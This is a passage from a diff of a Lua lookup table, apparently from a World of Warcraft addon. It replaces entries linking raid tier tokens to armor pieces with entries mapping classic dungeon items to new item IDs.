}, - -- Stormcaller's Footguards - ["21373"] = { - 20932, -- Qiraji Bindings of Dominance + -- Splinthide Shoulders + ["11685"] = { + 223987, -- Splinthide Shoulders }, - -- Stormcaller's Hauberk - ["21374"] = { - 20929, -- Carapace of the Old God + -- Dregmetal Spaulders + ["11722"] = { + 223544, -- Dregmetal Spaulders }, - -- Stormcaller's Leggings - ["21375"] = { - 20931, -- Skin of the Great Sandworm + -- Savage Gladiator Chain + ["11726"] = { + 227952, -- Savage Gladiator Chain }, - -- Stormcaller's Pauldrons - ["21376"] = { - 20932, -- Qiraji Bindings of Dominance + -- Savage Gladiator Helm + ["11729"] = { + 227955, -- Savage Gladiator Helm }, - -- Avenger's Crown - ["21387"] = { - 20930, -- Vek'lor's Diadem + -- Savage Gladiator Grips + ["11730"] = { + 227961, -- Savage Gladiator Grips }, - -- Avenger's Greaves - ["21388"] = { - 20932, -- Qiraji Bindings of Dominance + -- Savage Gladiator Greaves + ["11731"] = { + 227957, -- Savage Gladiator Greaves }, - -- Avenger's Breastplate - ["21389"] = { - 20929, -- Carapace of the Old God + -- Rockfist + ["11743"] = { + 227968, -- Rockfist }, - -- Avenger's Legguards - ["21390"] = { - 20931, -- Skin of the Great Sandworm + -- Bloodfist + ["11744"] = { + 227951, -- Bloodfist }, - -- Avenger's Pauldrons - ["21391"] = { - 20932, -- Qiraji Bindings of Dominance + -- Golem Skull Helm + ["11746"] = { + 227975, -- Golem Skull Helm }, - -- Sickle of Unyielding Strength - ["21392"] = { - 20886, -- Qiraji Spiked Hilt + -- Flamestrider Robes + ["11747"] = { + 223981, -- Flamestrider Robes }, - -- Signet of Unyielding Strength - ["21393"] = { - 20884, -- Qiraji Magisterial Ring + -- Searingscale Leggings + ["11749"] = { + 223980, -- Searingscale Leggings }, - -- Drape of Unyielding Strength - ["21394"] = { - 20885, -- Qiraji Martial Drape + -- Kindling Stave + ["11750"] = { + 223538, -- Kindling Stave }, - -- Blade of Eternal Justice - ["21395"] = { - 20886, -- Qiraji Spiked Hilt + -- Verek's Collar + ["11755"] = { + 227943, -- Verek's Collar }, - -- Ring of Eternal Justice - ["21396"] = { - 20884, -- Qiraji Magisterial Ring + -- Boreal Mantle + ["11782"] = { + 227954, -- Boreal Mantle }, - -- Cape of Eternal Justice - ["21397"] = { - 20889, -- Qiraji Regal Drape + -- Arbiter's Blade + ["11784"] = { + 223983, -- Arbiter's Blade }, - -- Hammer of the Gathering Storm - ["21398"] = { - 20886, -- Qiraji Spiked Hilt + -- Stone of the Earth + ["11786"] = { + 227950, -- Stone of the Earth }, - -- Ring of the Gathering Storm - ["21399"] = { - 20884, -- Qiraji Magisterial Ring + -- Force of Magma + ["11803"] = { + 227949, -- Force of Magma }, - -- Cloak of the Gathering Storm - ["21400"] = { - 20889, -- Qiraji Regal Drape + -- Rubidium Hammer + ["11805"] = { + 227946, -- Rubidium Hammer }, - -- Scythe of the Unseen Path - ["21401"] = { - 20886, -- Qiraji Spiked Hilt + -- Circle of Flame + ["11808"] = { + 227973, -- Circle of Flame }, - -- Signet of the Unseen Path - ["21402"] = { - 20888, -- Qiraji Ceremonial Ring + -- Flame Wrath + ["11809"] = { + 227934, -- Flame Wrath }, - -- Cloak of the Unseen Path - ["21403"] = { - 20889, -- Qiraji Regal Drape + -- Cape of the Fire Salamander + ["11812"] = { + 227970, -- Cape of the Fire Salamander }, - -- Dagger of Veiled Shadows - ["21404"] = { - 20886, -- Qiraji Spiked Hilt + -- Molten Fists + ["11814"] = { + 227971, -- Molten Fists }, - -- Band of Veiled Shadows - ["21405"] = { - 20888, -- Qiraji Ceremonial Ring + -- Hand of Justice + ["11815"] = { + 228722, -- Hand of Justice }, - -- Cloak of Veiled Shadows - ["21406"] = { - 20885, -- Qiraji Martial Drape + -- Angerforge's Battle Axe + ["11816"] = { + 227948, -- Angerforge's Battle Axe }, - -- Mace of Unending Life - ["21407"] = { - 20890, -- Qiraji Ornate Hilt + -- Lord General's Sword + ["11817"] = { + 227940, -- Lord General's Sword }, - -- Band of Unending Life - ["21408"] = { - 20884, -- Qiraji Magisterial Ring + -- Second Wind + ["11819"] = { + 227967, -- Second Wind }, - -- Cloak of Unending Life - ["21409"] = { - 20889, -- Qiraji Regal Drape + -- Omnicast Boots + ["11822"] = { + 227965, -- Omnicast Boots }, - -- Gavel of Infinite Wisdom - ["21410"] = { - 20890, -- Qiraji Ornate Hilt + -- Luminary Kilt + ["11823"] = { + 227964, -- Luminary Kilt }, - -- Ring of Infinite Wisdom - ["21411"] = { - 20888, -- Qiraji Ceremonial Ring + -- Cyclopean Band + ["11824"] = { + 223985, -- Cyclopean Band }, - -- Shroud of Infinite Wisdom - ["21412"] = { - 20885, -- Qiraji Martial Drape + -- Burst of Knowledge + ["11832"] = { + 227972, -- Burst of Knowledge }, - -- Blade of Vaulted Secrets - ["21413"] = { - 20890, -- Qiraji Ornate Hilt + -- Chief Architect's Monocle + ["11839"] = { + 227969, -- Chief Architect's Monocle }, - -- Band of Vaulted Secrets - ["21414"] = { - 20884, -- Qiraji Magisterial Ring + -- Wraith Scythe + ["11920"] = { + 227941, -- Wraith Scythe }, - -- Drape of Vaulted Secrets - ["21415"] = { - 20885, -- Qiraji Martial Drape + -- Impervious Giant + ["11921"] = { + 227960, -- Impervious Giant }, - -- Kris of Unspoken Names - ["21416"] = { - 20890, -- Qiraji Ornate Hilt + -- Blood-etched Blade + ["11922"] = { + 227963, -- Blood-etched Blade }, - -- Ring of Unspoken Names - ["21417"] = { - 20888, -- Qiraji Ceremonial Ring + -- The Hammer of Grace + ["11923"] = { + 227953, -- The Hammer of Grace }, - -- Shroud of Unspoken Names - ["21418"] = { - 20889, -- Qiraji Regal Drape + -- Robes of the Royal Crown + ["11924"] = { + 227980, -- Robes of the Royal Crown }, - -- Charm of the Shifting Sands - ["21504"] = { - 21220, -- Head of Ossirian the Unscarred + -- Ghostshroud + ["11925"] = { + 227958, -- Ghostshroud }, - -- Choker of the Shifting Sands - ["21505"] = { - 21220, -- Head of Ossirian the Unscarred + -- Deathdealer Breastplate + ["11926"] = { + 227956, -- Deathdealer Breastplate }, - -- Pendant of the Shifting Sands - ["21506"] = { - 21220, -- Head of Ossirian the Unscarred + -- Legplates of the Eternal Guardian + ["11927"] = { + 227959, -- Legplates of the Eternal Guardian }, - -- Amulet of the Shifting Sands - ["21507"] = { - 21220, -- Head of Ossirian the Unscarred + -- Thaurissan's Royal Scepter + ["11928"] = { + 227984, -- Thaurissan's Royal Scepter }, - -- Ring of the Fallen God - ["21709"] = { - 21221, -- Eye of C'Thun + -- The Emperor's New Cape + ["11930"] = { + 227985, -- The Emperor's New Cape }, - -- Cloak of the Fallen God - ["21710"] = { - 21221, -- Eye of C'Thun + -- Dreadforge Retaliator + ["11931"] = { + 227981, -- Dreadforge Retaliator }, - -- Amulet of the Fallen God - ["21712"] = { - 21221, -- Eye of C'Thun + -- Guiding Stave of Wisdom + ["11932"] = { + 227982, -- Guiding Stave of Wisdom }, - -- Desecrated Breastplate - ["22349"] = { - 22416, -- Dreadnaught Breastplate - 22476, -- Bonescythe Breastplate + -- Imperial Jewel + ["11933"] = { + 227988, -- Imperial Jewel }, - -- Desecrated Tunic - ["22350"] = { - 22425, -- Redemption Tunic - 22436, -- Cryptstalker Tunic - 22464, -- Earthshatter Tunic - 22488, -- Dreamwalker Tunic + -- Magmus Stone + ["11935"] = { + 227978, -- Magmus Stone }, - -- Desecrated Robe - ["22351"] = { - 22496, -- Frostfire Robe - 22504, -- Plagueheart Robe - 22512, -- Robe of Faith + -- Star of Mystaria + ["12103"] = { + 228536, -- Star of Mystaria }, - -- Desecrated Legplates - ["22352"] = { - 22417, -- Dreadnaught Legplates - 22477, -- Bonescythe Legplates + -- Plans: Moonsteel Broadsword + ["12163"] = { + 217282, -- Plans: Moonsteel Broadsword }, - -- Desecrated Helmet - ["22353"] = { - 22418, -- Dreadnaught Helmet - 22478, -- Bonescythe Helmet + -- Reins of the Golden Sabercat + ["12327"] = { + 216570, -- Reins of the Golden Sabercat }, - -- Desecrated Pauldrons - ["22354"] = { - 22419, -- Dreadnaught Pauldrons - 22479, -- Bonescythe Pauldrons + -- Key to the City + ["12382"] = { + 228166, -- Key to the City }, - -- Desecrated Bracers - ["22355"] = { - 22423, -- Dreadnaught Bracers - 22483, -- Bonescythe Bracers + -- Sandstalker Ankleguards + ["12470"] = { + 223962, -- Sandstalker Ankleguards }, - -- Desecrated Waistguard - ["22356"] = { - 22422, -- Dreadnaught Waistguard - 22482, -- Bonescythe Waistguard + -- Desertwalker Cane + ["12471"] = { + 223533, -- Desertwalker Cane }, - -- Desecrated Gauntlets - ["22357"] = { - 22421, -- Dreadnaught Gauntlets - 22481, -- Bonescythe Gauntlets + -- Hands of the Exalted Herald + ["12554"] = { + 227979, -- Hands of the Exalted Herald }, - -- Desecrated Sabatons - ["22358"] = { - 22420, -- Dreadnaught Sabatons - 22480, -- Bonescythe Sabatons + -- Blackhand Doomsaw + ["12583"] = { + 228603, -- Blackhand Doomsaw }, - -- Desecrated Legguards - ["22359"] = { - 22427, -- Redemption Legguards - 22437, -- Cryptstalker Legguards - 22465, -- Earthshatter Legguards - 22489, -- Dreamwalker Legguards + -- Eye of Rend + ["12587"] = { + 228604, -- Eye of Rend }, - -- Desecrated Headpiece - ["22360"] = { - 22428, -- Redemption Headpiece - 22438, -- Cryptstalker Headpiece - 22466, -- Earthshatter Headpiece - 22490, -- Dreamwalker Headpiece + -- Bonespike Shoulder + ["12588"] = { + 228605, -- Bonespike Shoulder }, - -- Desecrated Spaulders - ["22361"] = { - 22429, -- Redemption Spaulders - 22439, -- Cryptstalker Spaulders - 22467, -- Earthshatter Spaulders - 22491, -- Dreamwalker Spaulders + -- Dustfeather Sash + ["12589"] = { + 228578, -- Dustfeather Sash }, - -- Desecrated Wristguards - ["22362"] = { - 22424, -- Redemption Wristguards - 22443, -- Cryptstalker Wristguards - 22471, -- Earthshatter Wristguards - 22495, -- Dreamwalker Wristguards + -- Felstriker + ["12590"] = { + 228757, -- Felstriker }, - -- Desecrated Girdle - ["22363"] = { - 22431, -- Redemption Girdle - 22442, -- Cryptstalker Girdle - 22470, -- Earthshatter Girdle - 22494, -- Dreamwalker Girdle + -- Blackblade of Shahram + ["12592"] = { + 228606, -- Blackblade of Shahram }, - -- Desecrated Handguards - ["22364"] = { - 22426, -- Redemption Handguards - 22441, -- Cryptstalker Handguards - 22469, -- Earthshatter Handguards - 22493, -- Dreamwalker Handguards + -- Starfire Tiara + ["12604"] = { + 228566, -- Starfire Tiara }, - -- Desecrated Boots - ["22365"] = { - 22430, -- Redemption Boots - 22440, -- Cryptstalker Boots - 22468, -- Earthshatter Boots - 22492, -- Dreamwalker Boots + -- Serpentine Skuller + ["12605"] = { + 227942, -- Serpentine Skuller }, - -- Desecrated Leggings - ["22366"] = { - 22497, -- Frostfire Leggings - 22505, -- Plagueheart Leggings - 22513, -- Leggings of Faith + -- Crystallized Girdle + ["12606"] = { + 228579, -- Crystallized Girdle }, - -- Desecrated Circlet - ["22367"] = { - 22498, -- Frostfire Circlet - 22506, -- Plagueheart Circlet - 22514, -- Circlet of Faith + -- Butcher's Apron + ["12608"] = { + 228556, -- Butcher's Apron }, - -- Desecrated Shoulderpads - ["22368"] = { - 22499, -- Frostfire Shoulderpads - 22507, -- Plagueheart Shoulderpads - 22515, -- Shoulderpads of Faith + -- Funeral Cuffs + ["12626"] = { + 228558, -- Funeral Cuffs }, - -- Desecrated Bindings - ["22369"] = { - 22503, -- Frostfire Bindings - 22511, -- Plagueheart Bindings - 22519, -- Bindings of Faith + -- Head of Rend Blackhand + ["12630"] = { + 227911, -- Head of Rend Blackhand }, - -- Desecrated Belt - ["22370"] = { - 22502, -- Frostfire Belt - 22510, -- Plagueheart Belt - 22518, -- Belt of Faith + -- Chiselbrand Girdle + ["12634"] = { + 228567, -- Chiselbrand Girdle }, - -- Desecrated Gloves - ["22371"] = { - 22501, -- Frostfire Gloves - 22509, -- Plagueheart Gloves - 22517, -- Gloves of Faith + -- Backusarian Gauntlets + ["12637"] = { + 228568, -- Backusarian Gauntlets }, - -- Desecrated Sandals - ["22372"] = { - 22500, -- Frostfire Sandals - 22508, -- Plagueheart Sandals - 22516, -- Sandals of Faith + -- Blackcrow + ["12651"] = { + 228559, -- Blackcrow }, - -- Dreadnaught Breastplate - ["22416"] = { - 22349, -- Desecrated Breastplate + -- Truestrike Shoulders + ["12927"] = { + 228583, -- Truestrike Shoulders }, - -- Dreadnaught Legplates - ["22417"] = { - 22352, -- Desecrated Legplates + -- Emberfury Talisman + ["12929"] = { + 228584, -- Emberfury Talisman }, - -- Dreadnaught Helmet - ["22418"] = { - 22353, -- Desecrated Helmet + -- Warmaster Legguards + ["12935"] = { + 228650, -- Warmaster Legguards }, - -- Dreadnaught Pauldrons - ["22419"] = { - 22354, -- Desecrated Pauldrons + -- Battleborn Armbraces + ["12936"] = { + 228651, -- Battleborn Armbraces }, - -- Dreadnaught Sabatons - ["22420"] = { - 22358, -- Desecrated Sabatons + -- Dal'Rend's Tribal Guardian + ["12939"] = { + 228652, -- Dal'Rend's Tribal Guardian }, - -- Dreadnaught Gauntlets - ["22421"] = { - 22357, -- Desecrated Gauntlets + -- Dal'Rend's Sacred Charge + ["12940"] = { + 228653, -- Dal'Rend's Sacred Charge }, - -- Dreadnaught Waistguard - ["22422"] = { - 22356, -- Desecrated Waistguard + -- Blademaster Leggings + ["12963"] = { + 228660, -- Blademaster Leggings }, - -- Dreadnaught Bracers - ["22423"] = { - 22355, -- Desecrated Bracers + -- Tristam Legguards + ["12964"] = { + 228661, -- Tristam Legguards }, - -- Redemption Wristguards - ["22424"] = { - 22362, -- Desecrated Wristguards + -- Blackmist Armguards + ["12966"] = { + 228662, -- Blackmist Armguards }, - -- Redemption Tunic - ["22425"] = { - 22350, -- Desecrated Tunic + -- Bloodmoon Cloak + ["12967"] = { + 228663, -- Bloodmoon Cloak }, - -- Redemption Handguards - ["22426"] = { - 22364, -- Desecrated Handguards + -- Frostweaver Cape + ["12968"] = { + 228664, -- Frostweaver Cape }, - -- Redemption Legguards - ["22427"] = { - 22359, -- Desecrated Legguards + -- Seeping Willow + ["12969"] = { + 228666, -- Seeping Willow }, - -- Redemption Headpiece - ["22428"] = { - 22360, -- Desecrated Headpiece + -- Painweaver Band + ["13098"] = { + 228667, -- Painweaver Band }, - -- Redemption Spaulders - ["22429"] = { - 22361, -- Desecrated Spaulders + -- Tooth of Gnarr + ["13141"] = { + 228669, -- Tooth of Gnarr }, - -- Redemption Boots - ["22430"] = { - 22365, -- Desecrated Boots + -- Brigam Girdle + ["13142"] = { + 228670, -- Brigam Girdle }, - -- Redemption Girdle - ["22431"] = { - 22363, -- Desecrated Girdle + -- Mark of the Dragon Lord + ["13143"] = { + 228585, -- Mark of the Dragon Lord }, - -- Cryptstalker Tunic - ["22436"] = { - 22350, -- Desecrated Tunic + -- Chillpike + ["13148"] = { + 228586, -- Chillpike }, - -- Cryptstalker Legguards - ["22437"] = { - 22359, -- Desecrated Legguards + -- Trindlehaven Staff + ["13161"] = { + 228587, -- Trindlehaven Staff }, - -- Cryptstalker Headpiece - ["22438"] = { - 22360, -- Desecrated Headpiece + -- Reiver Claws + ["13162"] = { + 228588, -- Reiver Claws }, - -- Cryptstalker Spaulders - ["22439"] = { - 22361, -- Desecrated Spaulders + -- Relentless Scythe + ["13163"] = { + 228601, -- Relentless Scythe }, - -- Cryptstalker Boots - ["22440"] = { - 22365, -- Desecrated Boots + -- Heart of the Scale + ["13164"] = { + 228589, -- Heart of the Scale }, - -- Cryptstalker Handguards - ["22441"] = { - 22364, -- Desecrated Handguards + -- Fist of Omokk + ["13167"] = { + 228570, -- Fist of Omokk }, - -- Cryptstalker Girdle - ["22442"] = { - 22363, -- Desecrated Girdle + -- Plate of the Shaman King + ["13168"] = { + 228571, -- Plate of the Shaman King }, - -- Cryptstalker Wristguards - ["22443"] = { - 22362, -- Desecrated Wristguards + -- Talisman of Evasion + ["13177"] = { + 228574, -- Talisman of Evasion }, - -- Earthshatter Tunic - ["22464"] = { - 22350, -- Desecrated Tunic + -- Brazecore Armguards + ["13179"] = { + 228572, -- Brazecore Armguards }, - -- Earthshatter Legguards - ["22465"] = { - 22359, -- Desecrated Legguards + -- Demonskin Gloves + ["13181"] = { + 228554, -- Demonskin Gloves }, - -- Earthshatter Headpiece - ["22466"] = { - 22360, -- Desecrated Headpiece + -- Phase Blade + ["13182"] = { + 228555, -- Phase Blade }, - -- Earthshatter Spaulders - ["22467"] = { - 22361, -- Desecrated Spaulders + -- Venomspitter + ["13183"] = { + 228573, -- Venomspitter }, - -- Earthshatter Boots - ["22468"] = { - 22365, -- Desecrated Boots + -- Sunderseer Mantle + ["13185"] = { + 228590, -- Sunderseer Mantle }, - -- Earthshatter Handguards - ["22469"] = { - 22364, -- Desecrated Handguards + -- Rhombeard Protector + ["13205"] = { + 228591, -- Rhombeard Protector }, - -- Earthshatter Girdle - ["22470"] = { - 22363, -- Desecrated Girdle + -- Slashclaw Bracers + ["13211"] = { + 228575, -- Slashclaw Bracers }, - -- Earthshatter Wristguards - ["22471"] = { - 22362, -- Desecrated Wristguards + -- Smolderweb's Eye + ["13213"] = { + 228576, -- Smolderweb's Eye }, - -- Bonescythe Breastplate - ["22476"] = { - 22349, -- Desecrated Breastplate + -- Fang of the Crystal Spider + ["13218"] = { + 228592, -- Fang of the Crystal Spider }, - -- Bonescythe Legplates - ["22477"] = { - 22352, -- Desecrated Legplates + -- Gilded Gauntlets + ["13244"] = { + 228577, -- Gilded Gauntlets }, - -- Bonescythe Helmet - ["22478"] = { - 22353, -- Desecrated Helmet + -- Trueaim Gauntlets + ["13255"] = { + 228561, -- Trueaim Gauntlets }, - -- Bonescythe Pauldrons - ["22479"] = { - 22354, -- Desecrated Pauldrons + -- Demonic Runed Spaulders + ["13257"] = { + 228562, -- Demonic Runed Spaulders }, - -- Bonescythe Sabatons - ["22480"] = { - 22358, -- Desecrated Sabatons + -- Wind Dancer Boots + ["13260"] = { + 228593, -- Wind Dancer Boots }, - -- Bonescythe Gauntlets - ["22481"] = { - 22357, -- Desecrated Gauntlets + -- Globe of D'sak + ["13261"] = { + 228563, -- Globe of D'sak }, - -- Bonescythe Waistguard - ["22482"] = { - 22356, -- Desecrated Waistguard + -- Ogreseer Tower Boots + ["13282"] = { + 228564, -- Ogreseer Tower Boots }, - -- Bonescythe Bracers - ["22483"] = { - 22355, -- Desecrated Bracers + -- Magus Ring + ["13283"] = { + 228565, -- Magus Ring }, - -- Dreamwalker Tunic - ["22488"] = { - 22350, -- Desecrated Tunic + -- Swiftdart Battleboots + ["13284"] = { + 228557, -- Swiftdart Battleboots }, - -- Dreamwalker Legguards - ["22489"] = { - 22359, -- Desecrated Legguards + -- Alanna's Embrace + ["13314"] = { + 228023, -- Alanna's Embrace }, - -- Dreamwalker Headpiece - ["22490"] = { - 22360, -- Desecrated Headpiece + -- Fluorescent Green Mechanostrider + ["13325"] = { + 228746, -- Fluorescent Green Mechanostrider }, - -- Dreamwalker Spaulders - ["22491"] = { - 22361, -- Desecrated Spaulders + -- Dracorian Gauntlets + ["13344"] = { + 228537, -- Dracorian Gauntlets }, - -- Dreamwalker Boots - ["22492"] = { - 22365, -- Desecrated Boots + -- Seal of Rivendare + ["13345"] = { + 228538, -- Seal of Rivendare }, - -- Dreamwalker Handguards - ["22493"] = { - 22364, -- Desecrated Handguards + -- Book of the Dead + ["13353"] = { + 228539, -- Book of the Dead }, - -- Dreamwalker Girdle - ["22494"] = { - 22363, -- Desecrated Girdle + -- Crown of Tyranny + ["13359"] = { + 228540, -- Crown of Tyranny }, - -- Dreamwalker Wristguards - ["22495"] = { - 22362, -- Desecrated Wristguards + -- Gift of the Elven Magi + ["13360"] = { + 228541, -- Gift of the Elven Magi }, - -- Frostfire Robe - ["22496"] = { - 22351, -- Desecrated Robe + -- Skullforge Reaver + ["13361"] = { + 228542, -- Skullforge Reaver }, - -- Frostfire Leggings - ["22497"] = { - 22366, -- Desecrated Leggings + -- Soulstealer Mantle + ["13374"] = { + 228520, -- Soulstealer Mantle }, - -- Frostfire Circlet - ["22498"] = { - 22367, -- Desecrated Circlet + -- Royal Tribunal Cloak + ["13376"] = { + 228505, -- Royal Tribunal Cloak }, - -- Frostfire Shoulderpads - ["22499"] = { - 22368, -- Desecrated Shoulderpads + -- Songbird Blouse + ["13378"] = { + 228501, -- Songbird Blouse }, - -- Frostfire Sandals - ["22500"] = { - 22372, -- Desecrated Sandals + -- Piccolo of the Flaming Fire + ["13379"] = { + 228502, -- Piccolo of the Flaming Fire }, - -- Frostfire Gloves - ["22501"] = { - 22371, -- Desecrated Gloves + -- Willey's Portable Howitzer + ["13380"] = { + 228522, -- Willey's Portable Howitzer }, - -- Frostfire Belt - ["22502"] = { - 22370, -- Desecrated Belt + -- Cannonball Runner + ["13382"] = { + 228523, -- Cannonball Runner }, - -- Frostfire Bindings - ["22503"] = { - 22369, -- Desecrated Bindings + -- Woollies of the Prancing Minstrel + ["13383"] = { + 228503, -- Woollies of the Prancing Minstrel }, - -- Plagueheart Robe - ["22504"] = { - 22351, -- Desecrated Robe + -- Rainbow Girdle + ["13384"] = { + 228504, -- Rainbow Girdle }, - -- Plagueheart Leggings - ["22505"] = { - 22366, -- Desecrated Leggings + -- The Postmaster's Tunic + ["13388"] = { + 228525, -- The Postmaster's Tunic }, - -- Plagueheart Circlet - ["22506"] = { - 22367, -- Desecrated Circlet + -- The Postmaster's Trousers + ["13389"] = { + 228527, -- The Postmaster's Trousers }, - -- Plagueheart Shoulderpads - ["22507"] = { - 22368, -- Desecrated Shoulderpads + -- The Postmaster's Band + ["13390"] = { + 228528, -- The Postmaster's Band }, - -- Plagueheart Sandals - ["22508"] = { - 22372, -- Desecrated Sandals + -- The Postmaster's Treads + ["13391"] = { + 228529, -- The Postmaster's Treads }, - -- Plagueheart Gloves - ["22509"] = { - 22371, -- Desecrated Gloves + -- The Postmaster's Seal + ["13392"] = { + 228524, -- The Postmaster's Seal }, - -- Plagueheart Belt - ["22510"] = { - 22370, -- Desecrated Belt + -- Boots of the Shrieker + ["13398"] = { + 228043, -- Boots of the Shrieker }, - -- Plagueheart Bindings - ["22511"] = { - 22369, -- Desecrated Bindings + -- Vambraces of the Sadist + ["13400"] = { + 228513, -- Vambraces of the Sadist }, - -- Robe of Faith - ["22512"] = { - 22351, -- Desecrated Robe + -- Timmy's Galoshes + ["13402"] = { + 228514, -- Timmy's Galoshes }, - -- Leggings of Faith - ["22513"] = { - 22366, -- Desecrated Leggings + -- Grimgore Noose + ["13403"] = { + 228515, -- Grimgore Noose }, - -- Circlet of Faith - ["22514"] = { - 22367, -- Desecrated Circlet + -- Mask of the Unforgiven + ["13404"] = { + 228500, -- Mask of the Unforgiven }, - -- Shoulderpads of Faith - ["22515"] = { - 22368, -- Desecrated Shoulderpads + -- Major Healing Potion + ["13446"] = { + 223913, -- Major Healing Potion }, - -- Sandals of Faith - ["22516"] = { - 22372, -- Desecrated Sandals + -- Purification Potion + ["13462"] = { + 223912, -- Purification Potion }, - -- Gloves of Faith - ["22517"] = { - 22371, -- Desecrated Gloves + -- Handcrafted Mastersmith Girdle + ["13502"] = { + 228672, -- Handcrafted Mastersmith Girdle }, - -- Belt of Faith - ["22518"] = { - 22370, -- Desecrated Belt + -- Runeblade of Baron Rivendare + ["13505"] = { + 228543, -- Runeblade of Baron Rivendare }, - -- Bindings of Faith - ["22519"] = { - 22369, -- Desecrated Bindings + -- Headmaster's Charge + ["13937"] = { + 228022, -- Headmaster's Charge }, - -- The Phylactery of Kel'Thuzad - ["22520"] = { - 23206, -- Mark of the Champion - 23207, -- Mark of the Champion + -- Tombstone Breastplate + ["13944"] = { + 228025, -- Tombstone Breastplate }, - -- Atiesh, Greatstaff of the Guardian (mage) - ["22589"] = { - 22726, -- Splinter of Atiesh + -- Detention Strap + ["13950"] = { + 228042, -- Detention Strap }, - -- Atiesh, Greatstaff of the Guardian (warlock) - ["22630"] = { - 22726, -- Splinter of Atiesh + -- Iceblade Hacker + ["13952"] = { + 228027, -- Iceblade Hacker }, - -- Atiesh, Greatstaff of the Guardian (priest) - ["22631"] = { - 22726, -- Splinter of Atiesh + -- Silent Fang + ["13953"] = { + 228024, -- Silent Fang }, - -- Atiesh, Greatstaff of the Guardian (druid) - ["22632"] = { - 22726, -- Splinter of Atiesh + -- Stoneform Shoulders + ["13955"] = { + 228001, -- Stoneform Shoulders }, - -- Splinter of Atiesh - ["22726"] = { - 22589, -- Atiesh, Greatstaff of the Guardian (mage) - 22630, -- Atiesh, Greatstaff of the Guardian (warlock) - 22631, -- Atiesh, Greatstaff of the Guardian (priest) - 22632, -- Atiesh, Greatstaff of the Guardian (druid) + -- Clutch of Andros + ["13956"] = { + 228005, -- Clutch of Andros }, - -- Mark of the Champion - ["23206"] = { - 22520, -- The Phylactery of Kel'Thuzad + -- Gargoyle Slashers + ["13957"] = { + 228007, -- Gargoyle Slashers }, - -- Mark of the Champion - ["23207"] = { - 22520, -- The Phylactery of Kel'Thuzad + -- Heart of the Fiend + ["13960"] = { + 228019, -- Heart of the Fiend }, - -- Fel Edged Battleaxe - ["23542"] = { - 23631, -- Plans: Fel Edged Battleaxe + -- Witchblade + ["13964"] = { + 228021, -- Witchblade }, - -- Plans: Fel Edged Battleaxe - ["23631"] = { - 23542, -- Fel Edged Battleaxe + -- Windreaver Greaves + ["13967"] = { + 228004, -- Windreaver Greaves }, - -- Naaru Lightwarden's Band - ["28790"] = { - 32385, -- Magtheridon's Head (Alliance) + -- Gravestone War Axe + ["13983"] = { + 228029, -- Gravestone War Axe }, - -- Ring of the Recalcitrant - ["28791"] = { - 32385, -- Magtheridon's Head (Alliance) + -- Frightalon + ["14024"] = { + 228015, -- Frightalon }, - -- A'dal's Signet of Defense - ["28792"] = { - 32385, -- Magtheridon's Head (Alliance) + -- Bottomless Bag + ["14156"] = { + 228994, -- Bottomless Bag }, - -- Band of Crimson Fury - ["28793"] = { - 32385, -- Magtheridon's Head (Alliance) + -- Geomancer's Cord + ["14217"] = { + 223173, -- Geomancer's Cord }, - -- Voidheart Crown - ["28963"] = { - 29759, -- Helm of the Fallen Hero + -- Geomancer's Boots + ["14218"] = { + 223174, -- Geomancer's Boots }, - -- Voidheart Robe - ["28964"] = { - 29755, -- Chestguard of the Fallen Hero + -- Geomancer's Cloak + ["14219"] = { + 223175, -- Geomancer's Cloak }, - -- Voidheart Leggings - ["28966"] = { - 29765, -- Leggings of the Fallen Hero + -- Geomancer's Cap + ["14220"] = { + 223177, -- Geomancer's Cap }, - -- Voidheart Mantle - ["28967"] = { - 29762, -- Pauldrons of the Fallen Hero + -- Geomancer's Bracers + ["14221"] = { + 223178, -- Geomancer's Bracers }, - -- Voidheart Gloves - ["28968"] = { - 29756, -- Gloves of the Fallen Hero + -- Geomancer's Gloves + ["14222"] = { + 223180, -- Geomancer's Gloves }, - -- Warbringer Greathelm - ["29011"] = { - 29761, -- Helm of the Fallen Defender + -- Geomancer's Spaulders + ["14223"] = { + 223181, -- Geomancer's Spaulders }, - -- Warbringer Chestguard - ["29012"] = { - 29753, -- Chestguard of the Fallen Defender + -- Geomancer's Trousers + ["14224"] = { + 223182, -- Geomancer's Trousers }, - -- Warbringer Legguards - ["29015"] = { - 29767, -- Leggings of the Fallen Defender + -- Geomancer's Wraps + ["14225"] = { + 223183, -- Geomancer's Wraps }, - -- Warbringer Shoulderguards - ["29016"] = { - 29764, -- Pauldrons of the Fallen Defender + -- Death's Clutch + ["14503"] = { + 228036, -- Death's Clutch }, - -- Warbringer Handguards - ["29017"] = { - 29758, -- Gloves of the Fallen Defender + -- Pattern: Bottomless Bag + ["14510"] = { + 228993, -- Pattern: Bottomless Bag }, - -- Warbringer Breastplate - ["29019"] = { - 29753, -- Chestguard of the Fallen Defender + -- Maelstrom Leggings + ["14522"] = { + 228044, -- Maelstrom Leggings }, - -- Warbringer Gauntlets - ["29020"] = { - 29758, -- Gloves of the Fallen Defender + -- Rattlecage Buckler + ["14528"] = { + 228037, -- Rattlecage Buckler }, - -- Warbringer Battle-Helm - ["29021"] = { - 29761, -- Helm of the Fallen Defender + -- Frightskull Shaft + ["14531"] = { + 227994, -- Frightskull Shaft }, - -- Warbringer Greaves - ["29022"] = { - 29767, -- Leggings of the Fallen Defender + -- Bone Ring Helm + ["14539"] = { + 228032, -- Bone Ring Helm }, - -- Warbringer Shoulderplates - ["29023"] = { - 29764, -- Pauldrons of the Fallen Defender + -- Barovian Family Sword + ["14541"] = { + 227997, -- Barovian Family Sword }, - -- Cyclone Headdress - ["29028"] = { - 29760, -- Helm of the Fallen Champion + -- Darkshade Gloves + ["14543"] = { + 228031, -- Darkshade Gloves }, - -- Cyclone Hauberk - ["29029"] = { - 29754, -- Chestguard of the Fallen Champion + -- Ghostloom Leggings + ["14545"] = { + 228040, -- Ghostloom Leggings }, - -- Cyclone Kilt - ["29030"] = { - 29766, -- Leggings of the Fallen Champion + -- Ebon Hilt of Marduk + ["14576"] = { + 227993, -- Ebon Hilt of Marduk }, - -- Cyclone Shoulderpads - ["29031"] = { - 29763, -- Pauldrons of the Fallen Champion + -- Skullsmoke Pants + ["14577"] = { + 228017, -- Skullsmoke Pants }, - -- Cyclone Gloves - ["29032"] = { - 29757, -- Gloves of the Fallen Champion + -- Bloodmail Hauberk + ["14611"] = { + 228012, -- Bloodmail Hauberk }, - -- Cyclone Chestguard - ["29033"] = { - 29754, -- Chestguard of the Fallen Champion + -- Bloodmail Legguards + ["14612"] = { + 228003, -- Bloodmail Legguards }, - -- Cyclone Handguards - ["29034"] = { - 29757, -- Gloves of the Fallen Champion + -- 